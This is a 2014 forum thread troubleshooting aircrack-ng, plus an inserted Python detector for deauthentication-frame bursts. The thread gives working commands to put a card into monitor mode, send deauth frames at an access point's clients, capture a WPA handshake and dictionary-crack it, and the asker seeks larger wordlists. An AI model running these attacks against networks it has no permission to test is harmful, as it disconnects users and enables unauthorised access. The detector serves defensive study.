aireplay-ng --ignore-negative-one [SOLVED]

Started by th3_kRak3n, October 27, 2014, 10:12:24 PM


th3_kRak3n

asking because i don't find english solutions to this problem. google not really helping either:

aireplay-ng -0 2 -a MAC1 -c MAC2 mon0
waiting for beacon frame (BSSID: MAC1) on channel -1
couldn't determine current channel for mon0, you should either force the
operation with --ignore-negative-one or apply a kernel patch

1. how do i type the --ignore-negative-one in my command » 1st to see
  if that takes issue away
2. kernel patch if option 1 is not the solution > no idea how
3. why would i want to use the ESSID when the BSSID is ?more accurate?

ZEROF

#1
Stop network manager from your menu>services>network manager .... or from terminal then run aireplay etc... If this is not working, then install patched drivers, you can find howto in this forum.

P.S. Provide me your chipset and the drivers you are using and i will show you how to install patched drivers. For that, check if you have this tool installed:

apt-get install ethtool

To get info about your chipset and drivers

ethtool wlan0 or ethtool -i wlan0

Provide me with good info, and solution is posted before but let's see what we can do for you.

To learn, chipset are Ralink, TP-LINK etc and drivers are something like rtxxx or rtlxxx etc..

Don't ask, read : http://wiki.backbox.org

drego85

Of course, as ZEROF has already said, you have to stop programs running concurrently with aircrack. To do this you should run this command:

$ airmon-ng check kill

Andrea
Andrea Draghetti

nix8

I've encountered this error in the past many times. I own four different Alfa wireless NICs, and to get around this problem all I have to do is:

service network-manager stop
airmon-ng check kill && airmon-ng start wlan0
ifconfig wlan0 down
airodump-ng -f 1000 mon0 (as an example)


I usually double check wpa_supplicant is not running as it does seem to affect monitor mode.

killall wpa_supplicant

Your monitor interface (eg mon0) will still be available even after putting your primary wireless interface (eg wlan0) down. This fixes the -1 channel issue for me without patching any drivers.

Hope this helps.

th3_kRak3n

thanks guys, sorry for the delay but got tied up with work.
thank you for the advice above, i followed it, and this is what happened:

airmon-ng
airmon-ng start wlan0

killall wpa_supplicant
service network-manager stop
airmon-ng check kill && airmon-ng start wlan0
ifconfig wlan0 down

airodump-ng mon0
>airodump-ng -f 1000
airodump-ng -c 1 --bssid E0:91:F5:84:8C:50 -w /home/krak3n/Desktop mon0

aireplay-ng -0 2 -a F8:1A:67:83:4C:B8 -c 94:35:0A:3F:56:3F mon0
20:31:34  Waiting for beacon frame (BSSID: F8:1A:67:83:4C:B8) on channel 12
20:31:35  mon0 is on channel 12, but the AP uses channel 5

aircrack-ng -a2 -b F8:1A:67:83:4C:B8 -w /etc/dictionaries-common/words /home/krak3n/Desktop/*.cap

<took about 15min>
passphrase not found, quitting aircrack

>> what does the bold mean ? LoL > nonetheless i went on with it, cause i saw the .cap file got bigger in size
it didn't have the pass-phrase. Do you think a proper big dictionary would resolve this? any suggestions or
a nudge in the right direction about the dictionary file?

weVeg

#5
guys there is something wrong with this attack....
this kind of replay aireplay-ng -0 2 -a F8:1A:67:83:4C:B8 -c 94:35:0A:3F:56:3F mon0 is made to select the frame and then replay it to collect ivs that you don't need to crack wpa...
for wpa you need to catch the handshake and then try bruteforce or dict....
you mix your attacks
a free voice is always liberating
under_r00t

nix8

#6
aireplay-ng -0 is a deauth attack. It's often very effective as clients will be forced to disconnect and reconnect. There's your four-way handshake.

krak3n:

airodump-ng -c 1 --bssid E0:91:F5:84:8C:50 -w /home/krak3n/Desktop mon0

This locks mon0 to channel 1.

aireplay-ng -0 2 -a F8:1A:67:83:4C:B8 -c 94:35:0A:3F:56:3F mon0
This will fail if the access point is not on channel one. Also, the BSSIDs do not match.. E0:91:F5:84:8C:50 vs F8:1A:67:83:4C:B8

You should probably read about how to use the tools a little more. See http://www.aircrack-ng.org/doku.php
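The forced disconnect-and-reconnect that nix8 describes is also what a network defender can watch for. The following is an added example, not part of the thread or of aircrack-ng: a minimal detector that parses raw 802.11 deauthentication frames and flags bursts against one client. The function names, the burst threshold and window, and the sample frames with their MAC addresses are all assumptions constructed for the illustration.

```python
import struct
from collections import defaultdict

def mac(b):
    return ":".join(f"{x:02X}" for x in b)

def parse_deauth(frame):
    """Return (dest, source, bssid, reason) for a raw 802.11 deauthentication
    frame (no radiotap header), or None for anything else."""
    if len(frame) < 26:  # 24-byte management header + 2-byte reason code
        return None
    fc = frame[0]
    # Byte 0: version (bits 0-1), type (bits 2-3, 0 = management), subtype (bits 4-7, 12 = deauth).
    if fc & 0x03 or (fc >> 2) & 0x03 or (fc >> 4) != 12:
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)
    return mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def flag_bursts(timed_frames, window=1.0, threshold=5):
    """Return (bssid, station) pairs with >= threshold deauths inside any window seconds (assumed tuning values)."""
    times = defaultdict(list)
    for ts, raw in timed_frames:
        parsed = parse_deauth(raw)
        if parsed:
            dest, src, bssid, _ = parsed
            station = dest if src == bssid else src  # either direction counts
            times[(bssid, station)].append(ts)
    flagged = set()
    for key, stamps in times.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:  # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(key)
                break
    return flagged

# Constructed sample capture; the MAC addresses are made-up, locally administered values.
AP, STA, OTHER = "02:00:00:00:00:01", "02:00:00:00:00:02", "02:00:00:00:00:03"
def _frame(subtype, dest, src, bssid, body):
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return bytes([subtype << 4, 0, 0, 0]) + raw(dest) + raw(src) + raw(bssid) + b"\x00\x00" + body

BEACON = _frame(8, "FF:FF:FF:FF:FF:FF", AP, AP, b"\x00" * 12)
# Six deauths to one client in half a second, a beacon, and one lone deauth from another station.
SAMPLE = [(0.1 * i, _frame(12, STA, AP, AP, struct.pack("<H", 7))) for i in range(6)]
SAMPLE += [(0.25, BEACON), (10.0, _frame(12, AP, OTHER, AP, struct.pack("<H", 3)))]
```

Calling `flag_bursts(SAMPLE)` reports only the AP/client pair that received the burst; the single deauthentication from the other station stays below the threshold.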

th3_kRak3n

apologies guys, seems that in my hurry i copied and pasted wrongly from my history file last night. i tried 2 diff wifi routers. got mixed up
i appreciate all the help though.

weVeg

oops =)
I didn't check aireplay's help!
Just what I remember about aircrack-ng (I made a mistake with the "2" flag)!
sorry!!
a free voice is always liberating
under_r00t